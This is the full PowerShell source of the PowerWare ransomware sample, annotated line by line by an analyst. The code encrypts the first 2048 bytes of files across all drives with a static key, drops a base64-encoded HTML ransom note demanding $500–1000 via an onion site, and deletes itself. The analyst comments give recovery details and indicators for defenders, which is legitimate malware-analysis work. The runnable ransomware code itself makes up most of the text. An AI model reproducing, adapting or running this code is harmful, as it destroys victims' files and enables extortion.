Antelox

PowerWare ransomware

Jun 18th, 2016
  # Analyst notes (setup phase): builds one symmetric cipher object from constants
  # embedded in this file, then lists the drives that will be walked.
  # Triage takeaway: every input to the key and the IV below is a literal in this
  # listing, so the same key/IV pair applies to every file this sample touches and
  # a preserved copy of the script is enough to derive them for recovery.
  #
  # Password string later passed to the PBKDF2 key derivation.
  1. $3874834648482342 = "gRgxncRtshhfcRhnYjjxWdahsjHHNcgFhhsHHJFGbdFGHJHrfThsjdU"
  # Salt string for the same derivation (UTF-8 encoded a few lines below).
  2. $376385476393694623 = "UYUhxWsagfsEgshThgnhccRghsdUUJgcrXhzicGhsjThgdhj"
  # 24 distinct random characters drawn from 0-9, A-Z, a-z. Within this listing the
  # value is only written into the ransom note as the "#UUID"; it does not feed the
  # key derivation and nothing visible here transmits it.
  3. $879587454376573 = ([ChaR[]](GeT-Random -Input $(48..57 + 65..90 + 97..122) -Count 24)) -join ""
  # 44-second pause before any file activity - presumably to outlast short sandbox
  # runs; the listing itself gives no reason.
  4. Start-Sleep 44
  # UTF-16LE bytes of the password. This variable is overwritten with file contents
  # inside the file loop before it is used, so the initial value has no effect.
  5. [byte[]]$56437843773343=[system.Text.Encoding]::Unicode.GetBytes($3874834648482342)
  # Never referenced again in this listing; looks like filler.
  6. $GxhRgsjhdYHnJkl = 23 + 10
  7. $VGHKJJGFERHJJGSDQWD = [Text.Encoding]::UTF8.GetBytes($376385476393694623)
  8. $cWijGhxjctJJjRgjj = new-Object System.Security.Cryptography.RijndaelManaged
  # Key = 32 bytes (256 bits) from Rfc2898DeriveBytes (PBKDF2) over the password and
  # salt above, with an iteration count of 5.
  9. $cWijGhxjctJJjRgjj.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $3874834648482342, $VGHKJJGFERHJJGSDQWD, 5).GetBytes(32)
  # IV = first 16 bytes of SHA-1 over the literal string "alle"; fixed for every file.
  10. $cWijGhxjctJJjRgjj.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]
  # Zero padding and CBC mode. A decryption routine has to use the same two settings.
  11. $cWijGhxjctJJjRgjj.Padding="Zeros"
  12. $cWijGhxjctJJjRgjj.Mode="CBC"
  # gdr is the alias of Get-PSDrive; keeping drives with a non-zero Free value selects
  # file-system drives, which would include mapped network shares as well as local
  # volumes - scope the incident accordingly.
  13. $RgxnnHgxghRThajcUJJ= gdr|where {$_.Free}|Sort-Object -Descending
  # Analyst notes (file-processing phase): for every drive in $RgxnnHgxghRThajcUJJ,
  # recurse from the drive root and process each file whose name matches the
  # extension list below (documents, media, archives, source code, databases,
  # disk images, game data).
  # What is visible per file:
  #   - files shorter than 2048 bytes are left untouched;
  #   - only the first 2048 bytes are read, encrypted with the cipher object
  #     $cWijGhxjctJJjRgjj configured earlier in the script, and written back in
  #     place; the remainder of the file is not modified;
  #   - the file is not renamed and no extension is appended, so rename- or
  #     extension-based detections will not fire on this sample;
  #   - a note named README-Encrypted_Files.HTML is dropped once per directory,
  #     which makes that file name the most reliable host indicator here.
  14. foreach($TgbcRThahjdRRGHjj in $RgxnnHgxghRThajcUJJ){
  15.  gci $TgbcRThahjdRRGHjj.root -Recurse -Include "*.docx","*.xls","*.pdf","*.xlsx","*.mp3","*.jpeg","*.jpg","*.txt","*.rtf","*.doc","*.rar","*.zip","*.psd","*.tif","*.wma","*.gif","*.bmp","*.ppt","*.pptx","*.docm","*.xlsm","*.pps","*.ppsx","*.ppd","*.eps","*.png","*.ace","*.djvu","*.tar","*.cdr","*.max","*.wmv","*.avi","*.wav","*.mp4","*.pdd","*.php","*.aac","*.ac3","*.amr","*.dwg","*.dxf","*.accdb","*.mod","*.tax2013","*.tax2014","*.oga","*.ogg","*.pbf","*.ra","*.raw","*.saf","*.wave","*.wow","*.wpk","*.3g2","*.3gp","*.3gp2","*.3mm","*.amx","*.avs","*.bik","*.dir","*.divx","*.dvx","*.evo","*.flv","*.qtq","*.tch","*.rts","*.rum","*.rv","*.scn","*.srt","*.stx","*.svi","*.swf","*.trp","*.vdo","*.wm","*.wmd","*.wmmp","*.wmx","*.wvx","*.xvid","*.3d","*.3d4","*.3df8","*.pbs","*.adi","*.ais","*.amu","*.arr","*.bmc","*.bmf","*.cag","*.cam","*.dng","*.ink","*.jif","*.jiff","*.jpc","*.jpf","*.jpw","*.mag","*.mic","*.mip","*.msp","*.nav","*.ncd","*.odc","*.odi","*.opf","*.qif","*.xwd","*.abw","*.act","*.adt","*.aim","*.ans","*.asc","*.ase","*.bdp","*.bdr","*.bib","*.boc","*.crd","*.diz","*.dot","*.dotm","*.dotx","*.dvi","*.dxe","*.mlx","*.err","*.euc","*.faq","*.fdr","*.fds","*.gthr","*.idx","*.kwd","*.lp2","*.ltr","*.man","*.mbox","*.msg","*.nfo","*.now","*.odm","*.oft","*.pwi","*.rng","*.rtx","*.run","*.ssa","*.text","*.unx","*.wbk","*.wsh","*.7z","*.arc","*.ari","*.arj","*.car","*.cbr","*.cbz","*.gz","*.gzig","*.jgz","*.pak","*.pcv","*.puz","*.r00","*.r01","*.r02","*.r03","*.rev","*.sdn","*.sen","*.sfs","*.sfx","*.sh","*.shar","*.shr","*.sqx","*.tbz2","*.tg","*.tlz","*.vsi","*.wad","*.war","*.xpi","*.z02","*.z04","*.zap","*.zipx","*.zoo","*.ipa","*.isu","*.jar","*.js","*.udf","*.adr","*.ap","*.aro","*.asa","*.ascx","*.ashx","*.asmx","*.asp","*.indd","*.asr","*.qbb","*.bml","*.cer","*.cms","*.crt","*.dap","*.htm","*.moz","*.svr","*.url","*.wdgt","*.abk","*.bic","*.big","*.blp","*.bsp","*.cgf","*.chk","*.col","*.cty","*.dem","*.elf","*.ff","*.gam","*.grf","*.h3m","*.h4r"
,"*.iwd","*.ldb","*.lgp","*.lvl","*.map","*.md3","*.mdl","*.mm6","*.mm7","*.mm8","*.nds","*.pbp","*.ppf","*.pwf","*.pxp","*.sad","*.sav","*.scm","*.scx","*.sdt","*.spr","*.sud","*.uax","*.umx","*.unr","*.uop","*.usa","*.usx","*.ut2","*.ut3","*.utc","*.utx","*.uvx","*.uxx","*.vmf","*.vtf","*.w3g","*.w3x","*.wtd","*.wtf","*.ccd","*.cd","*.cso","*.disk","*.dmg","*.dvd","*.fcd","*.flp","*.img","*.iso","*.isz","*.md0","*.md1","*.md2","*.mdf","*.mds","*.nrg","*.nri","*.vcd","*.vhd","*.snp","*.bkf","*.ade","*.adpb","*.dic","*.cch","*.ctt","*.dal","*.ddc","*.ddcx","*.dex","*.dif","*.dii","*.itdb","*.itl","*.kmz","*.lcd","*.lcf","*.mbx","*.mdn","*.odf","*.odp","*.ods","*.pab","*.pkb","*.pkh","*.pot","*.potx","*.pptm","*.psa","*.qdf","*.qel","*.rgn","*.rrt","*.rsw","*.rte","*.sdb","*.sdc","*.sds","*.sql","*.stt","*.t01","*.t03","*.t05","*.tcx","*.thmx","*.txd","*.txf","*.upoi","*.vmt","*.wks","*.wmdb","*.xl","*.xlc","*.xlr","*.xlsb","*.xltx","*.ltm","*.xlwx","*.mcd","*.cap","*.cc","*.cod","*.cp","*.cpp","*.cs","*.csi","*.dcp","*.dcu","*.dev","*.dob","*.dox","*.dpk","*.dpl","*.dpr","*.dsk","*.dsp","*.eql","*.ex","*.f90","*.fla","*.for","*.fpp","*.jav","*.java","*.lbi","*.owl","*.pl","*.plc","*.pli","*.pm","*.res","*.rsrc","*.so","*.swd","*.tpu","*.tpx","*.tu","*.tur","*.vc","*.yab","*.8ba","*.8bc","*.8be","*.8bf","*.8bi8","*.bi8","*.8bl","*.8bs","*.8bx","*.8by","*.8li","*.aip","*.amxx","*.ape","*.api","*.mxp","*.oxt","*.qpx","*.qtr","*.xla","*.xlam","*.xll","*.xlv","*.xpt","*.cfg","*.cwf","*.dbb","*.slt","*.bp2","*.bp3","*.bpl","*.clr","*.dbx","*.jc","*.potm","*.ppsm","*.prc","*.prt","*.shw","*.std","*.ver","*.wpl","*.xlm","*.yps","*.md3","*.1cd"|%{
  # Each file is handled inside try/catch with an empty catch: a file that cannot be
  # opened (locked, access denied) is skipped silently and leaves no error output.
  16.   try{
  # Opened read/write while allowing other readers only.
  17.    $ChhxnRJhhsncGHH = New-Object System.IO.BinaryReader([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
  # 'return' inside the ForEach-Object block ends processing of this item only,
  # so files under 2048 bytes stay intact.
  18.    if ($ChhxnRJhhsncGHH.BaseStream.Length -lt 2048){return}
  19.    else
  20.    {
  21.                         $gjYujsjdRThsncGHja = 2048
  22.    }
  # Reads exactly the leading 2048 bytes - the only region this sample alters.
  23.                         $56437843773343 = $ChhxnRJhhsncGHH.ReadBytes($gjYujsjdRThsncGHja)
  24.    $ChhxnRJhhsncGHH.Close()
  # Encrypts the 2048-byte header in memory. 2048 is a multiple of the 16-byte block
  # (RijndaelManaged's default block size is 128 bits), so zero padding adds nothing
  # and the ciphertext should be the same length as the plaintext it replaces.
  25.    $JkkxTYajncGRahjdjHJ = $cWijGhxjctJJjRgjj.CreateEncryptor()
  26.    $oUUixjHHhjjxRTHNJ = new-Object IO.MemoryStream
  27.    $HhxjhTTYhajdJJJasO = new-Object Security.Cryptography.CryptoStream $oUUixjHHhjjxRTHNJ,$JkkxTYajncGRahjdjHJ,"Write"
  28.    $HhxjhTTYhajdJJJasO.Write($56437843773343, 0,$56437843773343.Length)
  29.    $HhxjhTTYhajdJJJasO.Close()
  30.    $oUUixjHHhjjxRTHNJ.Close()
  31.    $JkkxTYajncGRahjdjHJ.Clear()
  32.    $Bnx587Fhsjc7ijF4 = $oUUixjHHhjjxRTHNJ.ToArray()
  # Re-opens the same path with FileMode.Open (no truncation) and writes from offset 0,
  # overwriting the original header in place. For recovery: decrypt only the first
  # 2048 bytes with the script's key/IV, CBC, zero padding; leave the rest as is.
  33.    $HhjxcRTahjdUYUIN = New-Object System.IO.BinaryWriter([System.IO.File]::Open($_, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
  34.    $HhjxcRTahjdUYUIN.Write($Bnx587Fhsjc7ijF4,0,$Bnx587Fhsjc7ijF4.Length)
  35.    $HhjxcRTahjdUYUIN.Close()
  # Ransom-note path: the directory of the file just processed. Host indicator:
  # creation of README-Encrypted_Files.HTML in many directories by a PowerShell process.
  36.    $uUhxjhcTYhajWRahhd = $_.Directory.ToString() + '\README-Encrypted_Files.HTML'
  # Base64 blob that decodes (UTF-8) to the HTML ransom note. The note text claims
  # "RSA-2048", which does not match the symmetric Rijndael/CBC routine above, and
  # it points the victim at h34lvzkn42mtovic.onion (also via an onion.nu web proxy) -
  # usable as a network indicator. The blob is decoded again for every file processed.
  37. $YuxjncRgahdjjcTYHJ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("PGh0bWw+DQo8dGl0bGU+WW91ciBGaWxlcyBBcmUgRW5jcnlwdGVkPC90aXRsZT4NCjxzdHlsZT4NCmEgeyBjb2xvcjpncmVlbjsgfQ0KLnRiIHsgIGJhY2tncm91bmQ6d2hpdGU7IGJvcmRlci1zdHlsZTpzb2xpZDsgYm9yZGVyLXdpZHRoOjFweDsgcGFkZGluZzozcHg7IGJvcmRlci1jb2xvcjpsaW1lOyB9DQoudHRsIHsgZm9udC1zaXplOjEzcHg7IGNvbG9yOjg4MDAwMDsgfQ0KPC9zdHlsZT4NCjxib2R5IHN0eWxlPSJ3aWR0aDoxMDAlOyBiYWNrZ3JvdW5kOiMzM0NDRkY7Ij4NCiAgPGNlbnRlcj4NCiAgPGRpdiBzdHlsZT0idGV4dC1hbGlnbjpsZWZ0OyBmb250LWZhbWlseTpBcmlhbDsgZm9udC1zaXplOjEzcHg7IGxpbmUtaGVpZ2h0OjIwcHg7IG1hcmdpbi10b3A6MTBweDsgd2lkdGg6ODAwcHg7IGJhY2tncm91bmQ6I0Y0RjRGNDsgcGFkZGluZzoyMHB4OyBib3JkZXItc3R5bGU6c29saWQ7IGJvcmRlci13aWR0aDo1cHg7IGJvcmRlci1jb2xvcjojQkFCQUJBOyI+DQogICAgPGI+PGZvbnQgY2xhc3M9InR0bCI+V2hhdCBoYXBwZW5lZCB0byB5b3VyIGZpbGVzPzwvYj48L2ZvbnQ+DQogICAgPGJyPg0KICAgIDxmb250IHN0eWxlPSJmb250LXNpemU6MTNweDsiPkFsbCBvZiB5b3VyIGZpbGVzIHdlcmUgcHJvdGVjdGVkIGJ5IGEgc3Ryb25nIGVuY3J5cHRpb24gd2l0aCBSU0EtMjA0OC4NCiAgICA8YnI+DQogICAgTW9yZSBpbmZvcm1hdGlvbiBhYm91dCB0aGUgZW5jcnlwdGlvbiBrZXlzIHVzaW5nIFJTQS0yMDQ4IGNhbiBiZSBmb3VuZCBoZXJlOiA8YSBocmVmPSJodHRwOi8vZW4ud2lraXBlZGlhLm9yZy93aWtpL1JTQV8oY3J5cHRvc3lzdGVtKSIgdGFyZ2V0PSJfYmxhbmsiPmh0dHA6Ly9lbi53aWtpcGVkaWEub3JnL3dpa2kvUlNBXyhjcnlwdG9zeXN0ZW0pPC9hPjxicj48L2ZvbnQ+DQogICAgPGJyPg0KICAgIDxiPjxmb250IGNsYXNzPSJ0dGwiPldoYXQgZG9lcyB0aGlzIG1lYW4/PC9iPjwvZm9udD4NCiAgICA8YnI+DQogICAgPGZvbnQgc3R5bGU9ImZvbnQtc2l6ZToxM3B4OyI+DQogICAgICBUaGlzIG1lYW5zIHRoYXQgdGhlIHN0cnVjdHVyZSBhbmQgZGF0YSB3aXRoaW4geW91ciBmaWxlcyBoYXZlIGJlZW4gaXJyZXZvY2FibHkgY2hhbmdlZCwgeW91IHdpbGwgbm90IGJlIGFibGUgdG8gd29yazxicj4gd2l0aCB0aGVtLCByZWFkIHRoZW0gb3Igc2VlIHRoZW0sIGl0IGlzIHRoZSBzYW1lIHRoaW5nIGFzIGxvc2luZyB0aGVtIGZvcmV2ZXIsIGJ1dCB3aXRoIG91ciBoZWxwLCB5b3UgY2FuIHJlc3RvcmUgdGhlbS4NCiAgICA8L2ZvbnQ+DQogICAgPGJyPjxicj4NCiAgICA8Yj48Zm9udCBjbGFzcz0idHRsIj5Ib3cgZGlkIHRoaXMgaGFwcGVuPzwvYj48L2ZvbnQ+DQogICAgPGJyPg0KICAgIDxmb250IHN0eWxlPSJmb250LXNpemU6MTNweDsiPg0KICAgICAgRXNwZWNpYWxseSBmb3Ige
W91LCBvbiBvdXIgc2VydmVyIHdhcyBnZW5lcmF0ZWQgdGhlIHNlY3JldCBrZXkgcGFpciBSU0EtMjA0OCAtIHB1YmxpYyBhbmQgcHJpdmF0ZS4NCiAgICAgIDxicj4NCiAgICAgIEFsbCB5b3VyIGZpbGVzIHdlcmUgZW5jcnlwdGVkIHdpdGggdGhlIHB1YmxpYyBrZXksIHdoaWNoIGhhcyBiZWVuIHRyYW5zZmVycmVkIHRvIHlvdXIgY29tcHV0ZXIgdmlhIHRoZSBJbnRlcm5ldC4NCiAgICAgIDxicj4NCiAgICAgIERlY3J5cHRpbmcgb2YgeW91ciBmaWxlcyBpcyBvbmx5IHBvc3NpYmxlIHdpdGggdGhlIGhlbHAgb2YgdGhlIHByaXZhdGUga2V5IGFuZCBkZWNyeXB0IHByb2dyYW0sIHdoaWNoIGlzIG9uIG91ciBzZWNyZXQgc2VydmVyLg0KICAgIDwvZm9udD4NCiAgICA8YnI+PGJyPg0KICAgIDxiPjxmb250IGNsYXNzPSJ0dGwiPldoYXQgZG8gSSBkbz88L2I+PC9mb250Pg0KICAgIDxicj4NCiAgICA8Zm9udCBzdHlsZT0iZm9udC1zaXplOjEzcHg7Ij4NCiAgICAgIEFsYXMsIGlmIHlvdSBkbyBub3QgdGFrZSB0aGUgbmVjZXNzYXJ5IG1lYXN1cmVzIGZvciB0aGUgc3BlY2lmaWVkIHRpbWUgdGhlbiB0aGUgY29uZGl0aW9ucyBmb3Igb2J0YWluaW5nIHRoZSBwcml2YXRlIGtleSB3aWxsIGJlIGNoYW5nZWQuDQogICAgICA8YnI+DQogICAgICBJZiB5b3UgcmVhbGx5IHZhbHVlIHlvdXIgZGF0YSwgdGhlbiB3ZSBzdWdnZXN0IHlvdSBkbyBub3Qgd2FzdGUgdmFsdWFibGUgdGltZSBzZWFyY2hpbmcgZm9yIG90aGVyIHNvbHV0aW9ucyBiZWNhdXNlIHRoZXkgZG8gbm90IGV4aXN0Lg0KICAgIDwvZm9udD4NCiAgICA8YnI+PGJyPg0KICAgIDxkaXYgY2xhc3M9InRiIiBzdHlsZT0iY29sb3I6Izg4MDAwMDsgZm9udC1zaXplOjEzcHg7IGJvcmRlci13aWR0aDozcHg7Ij4NCiAgICAgIEZvciBtb3JlIHNwZWNpZmljIGluc3RydWN0aW9ucywgcGxlYXNlIHZpc2l0IHRoaXMgaG9tZSBwYWdlOg0KICAgICAgPGhyPg0KICAgICAgPGI+MS48YSBocmVmPSJodHRwOi8vaDM0bHZ6a240Mm10b3ZpYy5vbmlvbi5udSIgdGFyZ2V0PSJfYmxhbmsiPmh0dHA6Ly9oMzRsdnprbjQybXRvdmljLm9uaW9uLm51PC9hPjwvYj4NCiAgICAgIDxicj4NClBsZWFzZSBzY3JvbGwgYmVsb3cgZm9yIHlvdXIgI1VVSUQ8L2I+DQogICAgPC9kaXY+DQogICAgPGJyPg0KICAgIDxkaXYgY2xhc3M9InRiIiBzdHlsZT0iZm9udC1zaXplOjEzcHg7IGJvcmRlci1jb2xvcjojODgwMDAwOyI+DQogICAgICBJZiBmb3Igc29tZSByZWFzb25zIHRoZSBhZGRyZXNzIGlzIG5vdCBhdmFpbGFibGUsIGZvbGxvdyB0aGVzZSBzdGVwczogPGhyPg0KICAgICAgMS4gRG93bmxvYWQgYW5kIGluc3RhbGwgdG9yLWJyb3dzZXI6IDxhIGhyZWY9Imh0dHA6Ly93d3cudG9ycHJvamVjdC5vcmcvcHJvamVjdHMvdG9yYnJvd3Nlci5odG1sLmVuIiB0YXJnZXQ9Il9ibGFuayI+aHR0cDovL3d3dy50b3Jwcm9qZWN0Lm9yZy9wcm9qZWN0cy90b3Jicm93c2VyLmh0bWwuZW48L2E+PGJyPg0KICAgICAgM
i4gQWZ0ZXIgYSBzdWNjZXNzZnVsIGluc3RhbGxhdGlvbiwgcnVuIHRoZSBicm93c2VyIGFuZCB3YWl0IGZvciBpbml0aWFsaXphdGlvbi48YnI+DQogICAgICAzLiBUeXBlIGluIHRoZSBhZGRyZXNzIGJhcjogPGZvbnQgc3R5bGU9ImZvbnQtd2VpZ2h0OmJvbGQ7IGNvbG9yOiMwMDk5Nzc7Ij5oMzRsdnprbjQybXRvdmljLm9uaW9uPC9mb250Pjxicj4NCiAgICAgIDQuIEZvbGxvdyB0aGUgaW5zdHJ1Y3Rpb25zIG9uIHRoZSBzaXRlLg0KICAgIDwvZGl2Pg0KICAgIDxicj4NCiAgICA8YnI+DQogICAgPGI+SU1QT1JUQU5UIElORk9STUFUSU9OOjwvYj48YnI+DQogICAgPGRpdiBjbGFzcz0idGIiIHN0eWxlPSJ3aWR0aDo3OTBweDsiPg0KICAgICAgWW91ciBIb21lIFBBR0U6IDxiPjxhIGhyZWY9Imh0dHA6Ly9oMzRsdnprbjQybXRvdmljLm9uaW9uLm51IiB0YXJnZXQ9Il9ibGFuayI+aHR0cDovL2gzNGx2emtuNDJtdG92aWMub25pb24ubnU8L2E+PC9iPjxicj4NCiAgICAgIFlvdXIgSG9tZSBQQUdFKHVzaW5nIFRPUik6IDxmb250IHN0eWxlPSJmb250LXdlaWdodDpib2xkOyBjb2xvcjojMDA5OTc3OyI+aDM0bHZ6a240Mm10b3ZpYy5vbmlvbjwvZm9udD48YnI+DQogICAgICA8Yj5QbGVhc2Ugc2Nyb2xsIGJlbG93IGZvciB5b3VyICNVVUlEPC9iPjxicj4NCiAgICA8L2Rpdj4NCiAgPC9kaXY+DQogIDwvY2VudGVyPg0KPC9ib2R5Pg0KPC9odG1sPg=="));
  # The note is created only when it is not already present in that directory, then
  # two lines are appended: the random "#UUID" string and a price line dated ten days
  # after the time of the run.
  38.    if(!(Test-path($uUhxjhcTYhajWRahhd))){
  39.    New-Item -Path $uUhxjhcTYhajWRahhd -ItemType file -Value $YuxjncRgahdjjcTYHJ
  40.    Add-Content -Path $uUhxjhcTYhajWRahhd -Value ("<p><h2>Your #UUID is $879587454376573</p></h2>")
  41.    Add-Content -Path $uUhxjhcTYhajWRahhd -Value ('<p><h2>The price for the decrypter goes from 500 $ to 1000 $ on the day of '+(Get-Date).AddDays(+10))
  42.    }}
  # Empty catch: every per-file failure is swallowed, so a missing error stream does
  # not mean every matching file was processed - verify file headers individually.
  43.                 catch
  44.                 {
  45.                
  46.                 }
  47.         }}
  # Analyst notes (cleanup phase): self-deletion. The function reads MyInvocation
  # from scope 1 (the scope that called it, here the script itself), takes the
  # script's own path from MyCommand.Path and removes that file.
  # Forensic consequence: after a full run the script is no longer on disk at its
  # original path. Because the key material lives only in the script text, recovery
  # depends on obtaining a copy another way - PowerShell script-block logging
  # (event ID 4104) or transcription if enabled, the delivery artefact that launched
  # it, or file carving from the volume.
  48.   function TUNBWEFGBVVTHJHJ() {
  49.     $hxhThajsnjncTYHJH = (Get-Variable MyInvocation -Scope 1).Value
  50.     $iUjhxjxrhajjdYHJHJ =  $hxhThajsnjncTYHJH.MyCommand.Path  
  51.     Remove-Item $iUjhxjxrhajjdYHJHJ
  52. }      
  # Invoked as the last statement, i.e. only after the drive walk has finished.
  53. TUNBWEFGBVVTHJHJ